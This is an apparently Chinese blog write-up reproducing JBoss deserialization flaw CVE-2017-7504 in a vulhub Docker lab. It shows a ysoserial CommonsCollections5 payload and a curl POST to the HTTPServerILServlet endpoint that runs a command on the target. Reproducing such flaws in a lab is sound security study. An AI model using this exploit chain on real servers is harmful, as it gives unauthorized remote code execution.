JBoss反序列化漏洞复现 CVE-2017-7504
·
1.准备:
1.1复现环境
漏洞环境:vulnhub靶场
工具准备:ysoserial
1.2环境启动
进入vulnhub目录下的jboss目录,进入CVE-2017-7504目录
cd /home/hbesljx/vulhub/jboss/CVE-2017-7504
docker-compoe启动漏洞环境
docker-compose up -d
访问靶机的8080端口。出现如下即为开启成功!

2.概念说明
JBoss什么
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。
3.漏洞原理
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
4.漏洞复现
4.1 ysoserial生成payload
ysoserial语法:
java -jar ysoserial.jar [选择利用链] [commands]
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser
4.2 将1.ser文件内容作为POST Body发送
curl http://192.168.133.140:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
4.3 查看靶场的目录
docker compose exec jboss bash
cd tmp/
ls

上传成功!
更多推荐



所有评论(0)